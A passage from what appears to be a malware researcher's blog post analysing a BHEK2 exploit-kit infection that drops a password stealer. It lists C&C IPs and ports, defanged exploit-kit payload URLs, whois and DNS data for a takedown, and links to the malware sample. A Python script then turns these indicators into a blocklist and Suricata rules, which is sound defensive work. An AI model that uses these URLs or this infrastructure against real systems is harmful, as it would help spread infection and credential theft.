A caveat before treating this as a listener: SERVICES_ACTIVE_DATABASE is the name of the Service Control Manager's database (the handle OpenSCManager returns), and TCP/53 to the machine's own DNS server is ordinary name resolution, so this line is more likely a reporting artifact than a bound backdoor port; confirm with netstat on the infected host or with the PCAP before calling it a backdoor.
Network Activity
How the stolen data was sent is described in this section.
1. Data was sent to remote hosts via HTTP/1.1 POST to the HOST:PORT pairs below:
180.235.150.72:8080
203.113.98.131:80
173.224.221.135:8080
206.176.226.157:8080
2. Connection attempts were also detected to these IPs:
132.248.49.112
113.130.65.77
(note that 132.248.49.112 is also ns3.pelamutrika.ru in the DNS data under "For the Shutdown Purpose" below, which ties the C&C side to the exploit-kit domain's own infrastructure)
The complete recorded communication data is in the PCAP;
a summary of the connections above can be seen here -->>[HERE]
↑ we can assume the C&C servers of this operation are at the IPs listed above.
3. The password stealer exp2.tmp.exe was downloaded from these hosts.
Below is the capture.
Are we supposed to laugh?
These morons are making a sick joke by putting many "HO HO HO.." strings in it.
Let's just shut down all of the services/IPs/domains related to this infection
and see who laughs "HO HO HO" in the end (facepalm)
To fellow "Good Guys" / Researchers
The malware sample can be downloaded here --->>[CLICK]
PCAP & RegShot can be downloaded here --->>[CLICK]
A ThreatExpert reference exists (not very detailed though..)--->>[CLICK]
Below are the infector and the long list of BHEK2's cracked URLs:
-------------------------------------------------------
INFECTOR BHEK2 LOONG URL :-)
-------------------------------------------------------
payload: h00p://pelamutrika[.]ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
field.swf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
score.swf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?vmsxmw=30:1n:1i:1i:33&dpr=2w:3g:3d:36:3c&knusk=2v:1k:1m:32:33:1k:1k:31:1j:1o&vtsf=clq
infector1.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?qxwfe=30:1n:1i:1i:33&anaxw=38:3e:3h&kfcb=2v:1k:1m:32:33:1k:1k:31:1j:1o&zzsp=1k:1d:1f:1d:1g:1d:1f
infector2.pdf: h00p://pelamutrika[.]ru:8080/forum/links/column.php?zxztpaa=30:1n:1i:1i:33&evx=3e&sev=2v:1k:1m:32:33:1k:1k:31:1j:1o&uaauvo=1k:1d:1f:1d:1g:1d:1f
For the Shutdown Purpose
domain: PELAMUTRIKA.RU
nserver: ns1.pelamutrika.ru. 62.76.189.72
nserver: ns2.pelamutrika.ru. 41.168.5.140
nserver: ns3.pelamutrika.ru. 132.248.49.112
nserver: ns4.pelamutrika.ru. 209.51.221.247
nserver: ns5.pelamutrika.ru. 208.87.243.196
nserver: ns6.pelamutrika.ru. 216.99.149.226
pelamutrika.ru A 42.121.116.38
pelamutrika.ru A 202.180.221.186
pelamutrika.ru A 208.87.243.131
pelamutrika.ru A 212.162.52.180
pelamutrika.ru A 212.162.56.210
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: NAUNET-REG-RIPN
admin-contact: https://client.naunet.ru/c/whoiscontact
created: 2012.11.25
paid-till: 2013.11.25
free-date: 2013.12.26
source: TCI
Last updated on 2012.12.09 19:06:53 MSK
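To make the shutdown and blocking data above directly usable, here is an added example (mine, not from the original post) that consolidates the indicators transcribed from the Network Activity section and from the whois/DNS block: it cross-references every IP by the role it plays, which surfaces that 132.248.49.112 is both a contacted host and ns3.pelamutrika.ru, produces a de-duplicated blocklist, and emits Suricata rules (Suricata 5+ keyword syntax) for the C&C POST endpoints and for lookups of the exploit-kit domain. The rule messages, sid range and classtype are my choices.

```python
import ipaddress

# Indicators transcribed from this post: C&C/proxy endpoints that received
# the HTTP POSTs, the extra connection attempts, and the nameserver and
# A-record IPs of the BHEK2 domain from the whois/DNS data.
DOMAIN = "pelamutrika.ru"
C2_POST_ENDPOINTS = {
    ("180.235.150.72", 8080),
    ("203.113.98.131", 80),
    ("173.224.221.135", 8080),
    ("206.176.226.157", 8080),
}
ATTEMPTED_CONNECTIONS = {"132.248.49.112", "113.130.65.77"}
NAMESERVERS = {
    "ns1.pelamutrika.ru": "62.76.189.72",
    "ns2.pelamutrika.ru": "41.168.5.140",
    "ns3.pelamutrika.ru": "132.248.49.112",
    "ns4.pelamutrika.ru": "209.51.221.247",
    "ns5.pelamutrika.ru": "208.87.243.196",
    "ns6.pelamutrika.ru": "216.99.149.226",
}
A_RECORDS = {
    "42.121.116.38", "202.180.221.186", "208.87.243.131",
    "212.162.52.180", "212.162.56.210",
}


def ip_roles():
    """Map every IP to the set of roles it plays in this infrastructure."""
    roles = {}

    def add(ip, role):
        ipaddress.ip_address(ip)          # raises on a typo in the transcription
        roles.setdefault(ip, set()).add(role)

    for ip, _port in C2_POST_ENDPOINTS:
        add(ip, "c2-post")
    for ip in ATTEMPTED_CONNECTIONS:
        add(ip, "attempted-connection")
    for ip in NAMESERVERS.values():
        add(ip, "nameserver")
    for ip in A_RECORDS:
        add(ip, "exploit-kit-host")
    return roles


def overlaps():
    """IPs that show up in more than one role: the best pivots, since one box
    serving two functions ties the pieces of the campaign together."""
    return {ip: r for ip, r in ip_roles().items() if len(r) > 1}


def blocklist():
    """Sorted, de-duplicated list of all IPs for a firewall or RTBH feed."""
    return sorted(ip_roles(), key=ipaddress.ip_address)


def suricata_rules(sid_start=9000001):
    """One rule per C&C POST endpoint plus one DNS rule for the EK domain."""
    rules = []
    sid = sid_start
    for ip, port in sorted(C2_POST_ENDPOINTS):
        rules.append(
            f'alert http $HOME_NET any -> {ip} {port} '
            f'(msg:"Stealer C2 POST to {ip}:{port}"; flow:established,to_server; '
            f'http.method; content:"POST"; classtype:trojan-activity; sid:{sid}; rev:1;)'
        )
        sid += 1
    rules.append(
        f'alert dns $HOME_NET any -> any any '
        f'(msg:"BHEK2 domain lookup {DOMAIN}"; dns.query; content:"{DOMAIN}"; nocase; '
        f'endswith; classtype:trojan-activity; sid:{sid}; rev:1;)'
    )
    return rules


if __name__ == "__main__":
    for ip, roles in sorted(overlaps().items()):
        print(f"pivot: {ip} is {', '.join(sorted(roles))}")
    print(f"{len(blocklist())} unique IPs to block")
    print("\n".join(suricata_rules()))
```

The IP rules will go stale as soon as the operators move the proxies, so treat the DNS rule on the domain and the HWID registry value mentioned above as the longer-lived indicators, and keep the IP list for the takedown requests rather than as a permanent detection.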